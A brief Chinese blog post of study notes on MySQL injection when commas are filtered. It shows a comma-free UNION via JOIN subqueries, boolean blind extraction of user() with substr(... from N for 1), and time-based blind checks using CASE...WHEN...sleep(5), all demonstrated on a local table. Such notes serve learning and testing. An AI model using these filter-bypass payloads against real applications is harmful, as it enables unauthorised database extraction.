C1imber's Blog

过滤逗号的mysql注入

字数统计: 298阅读时长: 1 min
2019/02/27 Share

过滤逗号的mysql注入

突然遇到的一个很懵逼的问题,于是百度学习了一番,记录一下,还是我太菜了,哎,学习学习!

union联合查询:

1
2
3
4
5
6
7
8
mysql> select * from user union select * from ((select 1)A join (select 2)B);
+----+----------+
| id | username |
+----+----------+
| 1 | test |
| 1 | 2 |
+----+----------+
2 rows in set (0.05 sec)

布尔盲注:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
mysql> select substr(user() from 1 for 1);
+-----------------------------+
| substr(user() from 1 for 1) |
+-----------------------------+
| r |
+-----------------------------+
1 row in set (0.00 sec)
mysql> select * from user where id=1 and substr(user() from 1 for 1)='r';
+----+----------+
| id | username |
+----+----------+
| 1 | test |
+----+----------+
1 row in set (0.00 sec)
mysql> select * from user where id=1 and substr(user() from 1 for 1)='a';
Empty set (0.00 sec)
mysql> select substr(user() from 2 for 1);
+-----------------------------+
| substr(user() from 2 for 1) |
+-----------------------------+
| o |
+-----------------------------+
1 row in set (0.00 sec)
mysql> select * from user where id=1 and substr(user() from 2 for 1)='o';
+----+----------+
| id | username |
+----+----------+
| 1 | test |
+----+----------+
1 row in set (0.00 sec)
```
### 时间盲注:
**使用case...when...then...else...end代替if判断**
```mysql
mysql> select * from user where id=1 and case substr(user() from 1 for 1) when 'r' then sleep(5) else sleep(0) end;
Empty set (5.04 sec)
mysql> select * from user where id=1 and case substr(user() from 1 for 1) when 'o' then sleep(5) else sleep(0) end;
Empty set (0.00 sec)

今后有时间再慢慢补充~

CATALOG
  1. 1. 过滤逗号的mysql注入
    1. 1.0.1. union联合查询:
    2. 1.0.2. 布尔盲注: